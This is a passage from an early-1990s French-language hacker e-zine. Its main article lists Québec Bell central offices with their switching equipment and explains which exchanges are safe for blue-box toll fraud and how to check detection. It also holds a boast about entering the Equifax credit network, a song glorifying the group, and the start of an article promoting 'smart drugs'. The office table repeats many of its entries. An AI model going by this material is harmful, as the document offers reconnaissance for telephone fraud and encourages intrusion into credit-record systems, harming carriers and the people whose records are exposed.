interessante. Le r‚seau quifax en est un trŠs complexe, trŠs grand, et
il vaut vraiment la peine d'ˆtre entr‚ au moins une seule fois dans la
vie d'un hacker... Lorsque j'y entre, je constate … quel point ils se
foutent tous de la vie priv‚e! Ca me d‚goute!

Je tiens … rajouter que nous-mˆme, de NPC, n'avons jamais, JUSQU'þ
MAINTENANT, ‚t‚ tent‚s d'aller jouer dans les dossiers de cr‚dit des
ennemis de NPC...



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

LES FACTURES ROUGES, C'EST POUR LE TEMPS DES FETES
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



QUAND LES BLUE-BOX PARCOURAIENT LA TERRE...

par

Blitzkreig


" -Is it safe?
-What?
-I said: Is it safe?"
-Marathon Man


Un de nos lecteurs d'Asbestos, -668, Satan's Neighbor-, nous ‚crit
pour nous demander si la "bonne vieille ‚poque" des blue-boxes ‚tait
vraiment termin‚e. Il se plaignait du fait qu'il avait ‚t‚ trop jeune …
l'‚poque de l'utilisation florissante des boxes, et qu'il regrettait de
ne pas avoir connu cette p‚riode apparemment fantastique. J'ai les mˆmes
regrets … propos de Woodstock et de la g‚n‚ration hippie: tout ce bon
acide que je n'ai jamais go–t‚...

Non, Neighbor, le blue box n'est pas tout … fait mort. Il se porte
encore trŠs bien dans plusieurs parties du monde, comme au Portugal, par
exemple. Mais l'arriv‚e de systŠmes de plus en plus perfectionn‚s dans
les centrales des fonecos augmente le risque de d‚tection du d‚sormais
c‚lŠbre 2600 Mhz... Les ESS et DMS, par exemple, vont te spotter en moins
de temps qu'il n'en faut pour crier "Je d‚bute, mais j'ai des tones"...

Ce problŠme pos‚, il faut maintenant pr‚ciser que le Bell n'a pas
install‚ des ESS dans tous ses CO, loin de l…. Il y a encore des
endroits, au Qu‚bec, o— le B.B. est encore autre chose qu'un groupe de
chanteurs pour midinettes. Northern Phun Co, ne reculant devant rien
(surtout qu'il n'y a rien en avant de nous!), publie aujourd'hui, en
exclusivit‚ MONDIALE, la liste COMPLETE des diff‚rents bureaux du Bell
avec chacuns des sytŠmes install‚s. Y‚!
Il est a noter que le nom … gauche indique le nom du CO, et non de la
ville. Bien s–r, dans 98% des cas, les deux correspondent. Mais dans
d'autres... Ainsi, les deux bureaux … Qu‚bec, St-Cyrille d'Aiguillon,
sont identifi‚s comme tels, et non pas dans "Qu‚bec".
En cas de doute, v‚rifiez l'indicatif (NNX) pour voir s'il correspond au
votre.



QUIPEMENT DE CENTRAL - LEXIQUE

NNX Indicatif de central
P-A-P Central pas … pas
5XB Bureau crossbar #5
ESS SystŠme de commutation ‚lectronique #1
SP1 SystŠme de commutation ‚lectronique SP1
N5-1 Crossbar N5-1
N5-2 Crossbar N5-2
SA-1 Crossbar SA-1
NJ-92 Radio-t‚l‚phone de circonscription
DMS 10 Autocommutateur DMS 10
DMS 100 Autocommutateur DMS 100
Ericson Crossbar Ericson
LAMA Comptabilit‚ automatique locale des appels
RLM Unit‚ de raccordement distant


CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100


AEROPORT BAGOTVILLE 677 x

ALBANEL 279 x

ALMA 662-8-9 x

ANCIENNE LORETTE 871-2-4-7 x

ANSE ST-JEAN 272 x

BAIE STE-CATHERINE 237 x

BAIE ST-PAUL 435 x

BEAUPORT 661-3-4 x

BEAUPORT 660-6-7 x

BERGERONNES 232 x

BIENCOURT 499 x

BLACK LAKE 423 x

BOISCHATEL 822 x

CABANO 854 x

CHAMBORD 342 x

CHARLESBOURG 621-2-3-4-6-7-8-890-976 LAMA

CHARNY 832 x

CHICOUTIMI 545-9-690-3-8 LAMA

CHICOUTIMI 543-5-6 x

CHUTE DES PASSES 377 x

CLERMONT 439 x

D'AIGUILLON 692-4 LAMA
DESBIENS

DELISLE 347 x

DOLBEAU 276 x

EAST BROUGHTON 427 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

ESCOUMINS 233 x

FERLAND 676 x

GARTHBY 458 x

GIRARDVILLE 258 x

HEBERTVILLE 343-4 x

ILE AUX COUDRES 438 x

INVERNESS 453 x

JONQUIERE-MELLON 548 x

JONQUIERE-ST-JACQUE 542-7-695 x

LA BAIE 544-697 x

LAC BOUCHETTE 348 x

LA DORE 256 x

LA MALBAIE 665 x

LA POCATIERE 856 x

LATERRIERE 678 x

LEEDS 424 x

LES EBOULEMENTS 635 x

LEVIS 833-5-7-8 x

L'ISLE VERT 898 x

LORETTEVILLE 842-3-5-7 x

AKULIVIK 496 x

ARUNDEL 687 x

ASBESTOS 879 x

AUPALUK 491 x x

AYER'S CLIFF 838 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

AYLMER 684-5 x

AYLMER 682 x

BAKER LAKE 793 x

BISHOPTON 884 x

BOUCHETTE 465 x

BROMPTONVILLE 846 x

BUCKINGHAM 986 x

BUCKINGHAM 281 x

BURY 872 x

CHAMPLAIN 295 x

CHAPEAU 689 x

CHARTIERVILLE 656 x

CHELSEA 827 x

COATICOOK 849 x

COMPTON 835 x

COOKSHIRE 875 x

DANVILLE 839 x

DEAUVILLE 864 x

DESCHAILLONS 292 x

DRUMMONDVILLE 472-5-8 LAMA

DRUMMONDVILLE 474-7 x

EAST ANGUS 832 x

EAST HEREFORD 644 x

FORT COULONGE 683 x

FORTIERVILLE 287 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

GATINEAU 643-663-9 LAMA

GRACEFIELD 463 x

GRAND MERE 533-8 x

GRAND REMOUS 438 x

HULL 770-1-6-7 x

HULL 595-770-2-3-953-994-7 LAMA

HULL 775-956-976 LAMA

INUKJIAK 254 x

IVUJIVIK 922 x

KANGIQSUALUJJUAQ 337 PBX 711

KANGIQSUJUAK 338 PBX 711

KANGIRSUK 935 x

KAZABAZUA 467 x

KUUJJUAQ 964 x

LABELLE 686 x

LAC DROLET 549 x

LAC MEGANTIC 583 x

LA MINERVE 274 x

L'ANNONCIATION 275 x

LA PATRIE 888 x

LAURIERVILLE 365 x

L'AVENIR 394 x

LOUISEVILLE 228 x

LOW 422 x

LONGUEIL-RTH 468-647 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

LONGUEIL-RTH 448 x

MANSONVILLE 292 x

MARIEVILLE 460 x

MASCOUCHE-ANGLAIS 467-968 x

MASCOUCHE-DUPRAS 474-966 x

MIRABEL-AEROPORT 476 x

MIRABEL-ST-AUGUSTIN 475 x

MIRABEL-STE-SCHOLA. 258 x

MONKLAND 369-481-2-3-4-5-6-7-8-9 LAMA

MONKLAND (Tel cel.) 497-591-4-944-5-7-952-983 LAMA

MONTREAL-NORD 321-2-3-4-5-6-7-8-852-955 LAMA

MONTREAL-NORD 327-9 x

MORIN HEIGHTS 226 x

NAPIERVILLE 245 x

OKA 479 x

ONTARIO (42CG1) 281-2-4-5-6-8-842 x

ONTARIO (42CG4) 287-841-7-8-863-499-982-7-350 LAMA

ONTARIO (42CG2) 496-280-283 LAMA

ONTARIO 840-3-4-5-9-289-985 LAMA

ORMSTOWN 829 x

PAPINEAU 523-4-7-8-790-859 LAMA

PAPINEAU 521-2-5-6-9-596-7-8-599 LAMA

PAPINEAU 941-4-5-7-952 LAMA

PIERREVILLE 568 x

POIN. TREMBLES-51e 498-642-4 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

POIN. TREMBLES-8e 640-5 x

POIN. TREM.-RIV. PR 643-8 x

POIN. TREM.-RIV. PR 494-881 LAMA

POIN. CLAIRE-ST-ANN 457 x

POIN. CLAIRE-ST-JOH 630-426-428-695-7 LAMA

PONT-VIAU 662-3-7-8-9-629-967-975 x

RAWDON 834 x

RIGAUD 451 x

RIVIERE BEAUDETTE 269 x

ROXBORO 683-4-5-421 LAMA

STE-ADELE 229 x

ST-ALPHONSE DE ROD. 883 x

ST-ANDRE E. 537 x

STE-ANNE DS PLAINES 478-838 x

ST-BARTHELEMY 885 x

ST-BLAISE 291 x

ST-BRUNO 461-653 x

ST-BRUNO 441 x

ST-CALIXTE 222 x

ST-CESAIRE 469 x

ST-CHRYSOSTOME 826 x

ST-CLET 456 x

ST-CONSTANT 632-8 x

ST-CONSTANT 635 x

ST-DAMASE 797 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

ST-DENIS 787 x

STE-DOMINIQUE 270-1-2-3-4-6-7-8-9-495-948 LAMA

ST-EUSTACHE 472-3-491 x

ST-EUSTACHE 623-974 LAMA

ST-FELIX DE VALOIS 889 x

ST-GAB. DE BRANDON 835 x

STE-GENEVIEVE 620-6 x

STE-GENEVIEVE 624-696 LAMA

ST-HIPPOLYTE 563 x

ST-HYACINTHE 773-4 x

ST-HYACINTHE 771-8 LAMA

ST-JACQUES 839 x

ST-JEAN DE MATHA 886 x

ST-JEAN LEBEAU 348-9 x

ST-JEAN LEBEAU 359 x

ST-JEAN-ST-JACQUES 346-7-357-8 LAMA

ST-JEROME 431-8-565-9 x

ST-JEROME 432-6 x

STE-JULIE VERCHERE 649 x

STE-JULIENNE 831 x

STE JUSTINE 764 x

ST-LAMBERT-ELM 465-6-671-2-923 LAMA

ST-LAMBERT-ST-HUBER 443-5-462-676-926 LAMA

ST-LAMBERT-ST-HUBER 656-678 x

ST-LAURENT 744-7-8-835 RLM

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

ST-LAURENT 283 RLM

ST-LIN 439 x

STE-MADELEINE 795 x

ST-MARC 584 x

STE-MARGUERITE 228 x

STE-MARTHE 459 x

STE-MARTINE 427 LAMA

ST-MICHEL 374-6-593-721-2-3-5-7-8-9 LAMA

ST-MICHEL SAINTS 833 x

ST-PAUL ABBOTSFORD 379 x

ST-PAUL L'ERMITE VOIR VILLE LE GARDEUR

STE-PIE DE BAGOT 772 x

STE-PIE-DE-GUIRE 784 x

ST-POLYCARPE 265 x

ST-REMI 454 x

STE-ROSE 622-5-8-963 LAMA

ST-SAUVEUR 227 x

ST-THEODORE 882 x

STE-THERESE-EGLISE 430 x

STE-THERESE-EGLISE 433-4-5-7-979 x

STE-THERESE-OUIMET 621-975 LAMA

ST-VINCENT PAUL-FAB 661-4 x

ST-VINC. PAUL-RIV P 665 x

ST-ZEPHIRIN 564 x

ST-ZENON 884 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

SAUVE 381-3-5-7-8-9-858 LAMA

SAUVE 382-4 x

SAUVE 386-592-942-3-9-951-3-984 LAMA

SHAWBRIDGE 224 x

SHERBROOKE 252-3-5 x

SHERBROOKE 251-4-6-7-9-899 LAMA

SHERBROOKE 283 RLM

SOREL 742-3 x

SOREL 746 LAMA

SUTTON 538 x

TERREBONNE 471-492 x

TERREBONNE 964 LAMA

VALLEYFIELD 371-3 x

VALLEYFIELD 370-7 x

VARENNES 652 x

VAUDREUIL 424-455 x

VERCHERES 583 x

VERDUN 362-761-2-5-6-7-8-9-888-976 LAMA

VILLE LE GUARDEUR 581-5 x

VILLE LE GUARDEUR 582-654-7 LAMA

WATERLOO 539 x

YAMASKA 789

COTEAU DU LAC 763 x

COTEAU LANDING 267 x

COTE-DES-NEIGES CG1 340-3-4-345-731-2-4-5-9 LAMA

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

COTE-DES-NEIGES CG0 341-2-736-7-8 LAMA

COTE-DES-NEIGES 283 RLM

COWANSVILLE 263 x

COWANSVILLE 266 x

CRABTREE 754 x

DORVAL VOIR LACHINE-DORVAL

DUDEMAINE 330-1-2-3-4-5-6-7-8-9-741-5-832-856 LAMA

DUDEMAINE (COPS) 851-3-749 & 957 LAMA

DUNHAM 295 x

EASTMAN 297 x

FARNHAM 293 x

FRANKLIN CENTRE 827 x

FRELIGHSBURG 298 x

GRANBY 375-8-776-7 x

GRANBY VICTORIA 372 x

HEMMINGFORD 247 x

HENRYVILLE 299 x

HOWICK 825 x

HUDSON 458 x

HUNTINGTON 264 x

ILE PERROT 425-453 x

JOLIETTE 752 LAMA

JOLIETTE 753-6 x

JOLIETTE 755-9 x

KNOWLTON 242 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

KNOWLTON 243 x

LACHINE-DORVAL 422-631-3-6 LAMA

LACHINE-14e Ave. 634-7-9 LAMA

LACHUTE 562 x

LACOLLE 246 x

LANORAIE 887 x

LAPRAIRIE 444-659 x

LASALLE 363-5-6-8-595 LAMA

LASALLE 364-7 x

L'ASSOMPTION 589 x

LAVAL-EST 688 x

LAVAL OUEST-PRINC. 689 x

LAVAL OUEST-PRINC. 969 LAMA

LAVAL OUEST-SAUVE 627 x

LAVAL OUEST-SAUVE 962 x

LAVALTRIE 586 x

L'EPIPHANIE 588 x

LES CEDRES 452 x x

LONGUEUIL-ST-I. 442-463-646-651-670-4-7-9-928 LAMA

ST-URBAIN 639 x

SACRE-COEUR 236 x

SAULT-AUX-MOUTONS 231 x

SQUATEC 855 x

STONEHAM 848 RLM

STRATFORD 443 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

TADOUSSAC 235 x

THETFORD MINES 334-5-8 LAMA

TRING JONCTION 426 x

TROIS PISTOLES 851 x

VALCARTIER 844 x

VILLE DEGELIS 653 x

ACTONVALE 546 x

ANJOU 351-2-3-4-5-6-493 x

ATWATER 930-3-7-8-9-936-854-846 LAMA

ATWATER 931-2-4-5-951 x
-6-8-9

BEAUHARNOIS 429 x

BEAUHARNOIS 225 x

BEDFORD 248 x

BELMONT 390-3-6-874-9 x
954

BELMONT 392-5-9-876-7-8 LAMA

BELMONT 394-7-8-868-870-1-2-5 LAMA

BELMONT 861-6-864-873 LAMA

BELMONT 390-391 LAMA

BELOEIL 464-7 x

BELOEIL 446 x

BERTHIERVILLE 836 x

BOUCHERVILLE 449-641-655 x

BROMONT 534 x

BROWNSBURG 533 x

CHAMBLY 447-658 RLM

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

CHATEAUGUAY 591-2-8 x

CHATEAUGUAY 699 LAMA

CHOMEDEY 681-2-6-7-8-973 LAMA

CLARENCEVILLE 294 x

METABETCHOUAN 349 x

MILOT 373 x

MONTAPICA 467 x

NORMANDIN 274 x

N.D. DES LAURENTIDE 849-841 x

N.D. DU LAC 899 x

PARC LAURENTIDES 846 x

PERIBONKA 374 x

PET.RIV.ST-FRANCOIS 632 x

RIVIERE BLEUE 893 x

RIVIERE DU LOUP 862-7-8 x

ROBERVAL 275 x

ST-ALEXANDRE DE K. 495 x

ST-AMBROISE 672 x

ST-ANDRE DE K. 493 x

STE-ANNE BEAUPRE 827 x

STE-ANNE PORTNEUF 238 x

STE-BRIGITTE LAVAL 825 x

STE-CATHERINE 875 x

ST-CYRILLE 527-681-2-3-4-6-7-8 LAMA

ST-ELEUTHERE 859 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

ST-FELICIEN 679 x

ST-FERDINAND D'H. 428 x

ST-FEREOL 826 x

ST-FIDELE 434 x

STE-FOY 651-3-7-8-9670 LAMA

STE-FOY (CGO) 563-4-650-2-4-656 LAMA

ST-FULGENCE 674 x

ST-GEDEON 345 x

ST-HILARION 457 x

ST-HONORE 673 x

ST HONORE DE TEM. 497 x

ST-IRENEE 452 x

ST JEAN DE DIEU 963 x

ST-JEAN ILE ORLEANS 829 x

ST-LEON DE CHIC 481 x

ST-NICOLAS 831 x

ST-NICOLAS 836 x

ST-PACOME 852 x

ST-PASCAL DE K. 492 x

STE-PETRONILLE 828 x

ST-PHILIPPE DE NERI 498 x

ST-PRIME 251 x

ST-REAL 528-641-643-4-6 LAMA
RLCM

ST-REAL 529-640-7-8-9-691 RLCM

ST-REAL 521-2-3-4-5 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

ST-ROMUALD 834 x

STE-ROSE DU NORD 675 x

ST-SIMEON 638 x

ST-TITE DES CAPS 823 x

AEROPORT BAGOTVILLE 677 x

ALBANEL 279 x

ALMA 662-8-9 x

ANCIENNE LORETTE 871-2-4-7 x

ANSE ST-JEAN 272 x

BAIE STE-CATHERINE 237 x

BAIE ST-PAUL 435 x

BEAUPORT 661-3-4 x

BEAUPORT 660-6-7 x

BERGERONNES 232 x

BIENCOURT 499 x

BLACK LAKE 423 x

BOISCHATEL 822 x

CABANO 854 x

CHAMBORD 342 x

CHARLESBOURG 621-2-3-4-6-7-8-890-976 LAMA

CHARNY 832 x

CHICOUTIMI 545-9-690-3-8 LAMA

CHICOUTIMI 543-5-6 x

CHUTE DES PASSES 377 x

CLERMONT 439 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

D'AIGUILLON 692-4

  
LAMA
DESBIENS

DELISLE 347 x

DOLBEAU 276 x

EAST BROUGHTON 427 x

ESCOUMINS 233 x

FERLAND 676 x

GARTHBY 458 x

GIRARDVILLE 258 x

HEBERTVILLE 343-4 x

ILE AUX COUDRES 438 x

INVERNESS 453 x

JONQUIERE-MELLON 548 x

JONQUIERE-ST-JACQUE 542-7-695 x

LA BAIE 544-697 x

LAC BOUCHETTE 348 x

LA DORE 256 x

LA MALBAIE 665 x

LA POCATIERE 856 x

LATERRIERE 678 x

LEEDS 424 x

LES EBOULEMENTS 635 x

LEVIS 833-5-7-8 x

L'ISLE VERT 898 x

LORETTEVILLE 842-3-5-7 x

LUSKVILLE 455

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

LYSTER 389 x

MAGOG 843-7 x

MAGOG 868 x

MANIWAKI 449 x

MANQUANE 971 x

MASKINONGE 227 x

MONTEBELLO 423 x

NOMININGUE 278 x

NORTH HATLEY 842 x

N.D. DE LOURDES 385 x

PAPINEAUVILLE 427 x

PERKINS 671 x

PLESSISVILLE 362 x

POINTE GATINEAU 561-8 x

POINTE GATINEAU 243-6 x

POSTE DE BALEINE 929 x

POVUNGNITUK 988 x

QUAQTAQ 492 x

QUYON 458 x

RICHMOND 826 x

ROCK FOREST 564-821 x

ROCK ISLAND 876 x

SALLUIT 255 x

ST-ADOLPHE D'HOWARD 327 x

ST-ADOLPHE DUDSWELL 887 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

STE-AGATHE 324-5-8 x

ST-BONIFACE 535 x

ST-DONAT 424 x

ST-FAUSTIN 688 x

ST-FELIX KINGSLEY 848 x

ST-GERMAIN GRANTHAM 395 x

ST-GUILLAUME 396 x

ST-JOVITE 425 x

ST-MALO 658 x

ST-MATHIEU 532 x

STE-MONIQUE 289 x

ST-PIERRE WAKEFIELD 457 x

ST-PIERRE BECQUETS 263 x

ST-SEBASTIEN FRONT 652 x

STE-SOPHIE LEVRARD 288 x

SAWYERVILLE 889 x

SCOTSTOWN 657 x

SHAWINIGAN 5e 536-7 x

SHAWINIGAN DES H. 539 x

SHERBROOKE 346-562-3-5-6-7-9 x

SHERBROOKE 564-620-621-2-3-9 x

SOUTH DURHAM 859 x

STOKE 878 x

TASIUJAQ 633 x

THURSO 985 x

CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100

TROIS-RIVIERES O. 377 x

TROIS-RIVIERES 374-5-6 x

TROIS-RIVIERES 370-1-2-3-8-9-380-891-3 LAMA

UMIUJAQ 331 x

VAL DAVID 322 x

VICTORIAVILLE 751-2-8 LAMA

WAKEFIELD MASHAM 456 x

WAKEFIELD VALLEY 459 x

WAKEHAM BAY 338 PBX 711

WATERVILLE 837 x

WEEDON 877 x

WICKHAM 398 x

WINDSOR 845 x

WOTTON 828 x

YAMACHICHE 296 x


Alors, 668 d'Asbestos, tu peux en th‚orie faire du blue-box de chez toi.
Cette liste ‚tait dat‚e du 31 janvier 93, ce qui porte … croire que peu
de changements risquent de se produire au cours des prochains mois. Ceci
dit, il existe un moyen "low-tech" pour v‚rifier si vous demeurez dans
une zone relativement "safe" pour faire du bluebox: demandez tout
simplement … votre t‚l‚phoniste locale si vous pouvez b‚n‚ficier de
l'option "transfert d'appels", de votre "area code". Les mˆmes systŠmes
qui ne peuvent pas d‚tecter les tones DTMF ill‚gaux ne peuvent pas non
plus offrir ce service.

Pour tous ceux qui ne sont pas encore en mesure d'appr‚cier cette liste,
c.….d. les d‚butants du phreak, nous sommes d‚j… en train de pr‚parer un
article sensationel sur les fonctions propres … CHACUNS des systŠmes de
Bell. Ca va ˆtre hot!

Mais n'oubliez pas, les tout-p'tits: frauder le Bell est ill‚gal!



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

YE! C'EST JUSTEMENT LE DOCUMENT QUE NOUS AVIONS PERDU!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



-(- ENTER PHUN CO -)-
by l0gRuS!

( Sung to the air of Enter Sandman, by Metallica)

Say your prayers, PD's ones
NpC's not gone
And we're there for long
You thought you were, free to sin
That NpShitø had won
But again you'd been wrong

Sleep with your deck open
Gripple your modem thight...

Exit Light (Bbs)
Enter Wild
Get down there CHoRUS
To The WorkShop of what never ends

Something's wrong
Encrypt philes
RCMP tonight
And other lames that bites...
Dreams of wars, Dreams of Trashs
Dreams of Deckering Fast
And of Cyberspace's lights..

Sleep with Toneloc open
Keep your board trojan-tight

CHoRUS + Get down..

Now i lay, down to sleep
Pray the Lord NpC for keeps
If NpC dies, before i awake
Pray the Lord anarchy remains..

Hush little lame, don't say a word
And never mind that noise you heard
It's just the Staff under your bed
A Zip-Gun pointed at your head..

Exit Light
Enter Wild
Bell's afraid
Exit Light
Enter Wild
Take my hand
To the WorkShop of what never ends

[( End of song )]

ø: Can be remplaced by Mephisto, 9-1-1, Dynamix, Morin, Lamers at
will..



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

NOUS AUSSI, NOUS SAURONS VOUS FAIRE CHANTER
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



SMART DRUGS REDUX

par
Coaxial Karma



"Drugs that boost intelligence..."

AprŠs l'article de Blitzkreig sur les smarts drugs (voir NPC #2), voici
l'article y faisant suite...

Pour les "cyberpunks", les "hackers" et les "phone phreaks", la
r‚alit‚ est quelque chose qui doit ˆtre rehauss‚e, chang‚e, ou
ajust‚e … ses besoins. La r‚alit‚ est infinie; la seule chose qui
nous limite dans ce monde est notre cerveau. Cependant, il existe
plus d'un moyen pour surpasser ces limites; soit en augmentant
vos capacit‚s cognitives, soit en augmentant vos capacit‚s
mn‚moniques, soit en am‚liorant les ‚changes au niveau
synaptique (ce qui vous permettra d'avoir plus de contr“le sur
vous-mˆme: r‚sistance au stress, r‚sistance … la fatigue...),
soit en lib‚rant des hormones, telle la vasopressine, qui fera
r‚agir votre cerveau en cons‚quence de celle-ci.

Dans cet article, je parlerai des trois neurotransmetteurs
principaux, et des effets caus‚s par l'hydergine.


I- Les Neurotransmetteurs

Les scientifiques ont d‚couvert que les cellules du cerveau (les
neurones) communiquaient entre elles par le biais de substances
chimiques sp‚ciales, appel‚es ®neurotransmetteurs¯, qu'elles
fabriquent. L'aptitude … apprendre, … se souvenir, … se nourrir,
… dormir, … ‚prouver des ‚motions d‚pend de l'aptitude de nos
cellules … fabriquer ces neurotransmetteurs, … les porter aux
autres cellules du cerveau et, aussi, … r‚pondre aux messagers
chimiques ‚manant des autres cellules c‚r‚brales. A mesure que
notre cerveau vieillit, il ne parvient plus … fabriquer ces
messagers chimiques essentiels et … y r‚agir. Or, il est
possible, dans certains cas, d'augmenter la quantit‚ de ces
neurotransmetteurs afin de ramener le fonctionnement du cerveau …
un niveau voisin de celui, caract‚ristique, d'individus jeunes ou
au d‚but de la maturit‚.

Notre cerveau produit ces neurotransmetteurs … partir des
substances nutritives dans nos aliments. Par exemple,
l'ac‚tylcholine est un neurotransmetteur n‚cessaire aux ‚l‚ments
du cerveau qui commandent les ‚motions primitives, telles les
pulsions sexuelles et le degr‚ de r‚action … des stimulants
ext‚rieurs (l'‚veil par rapport au sommeil par exemple). Il y
joue aussi un r“le trŠs important au niveau de la m‚moire, de
l'apprentissage, de la planification … long terme. Le cerveau
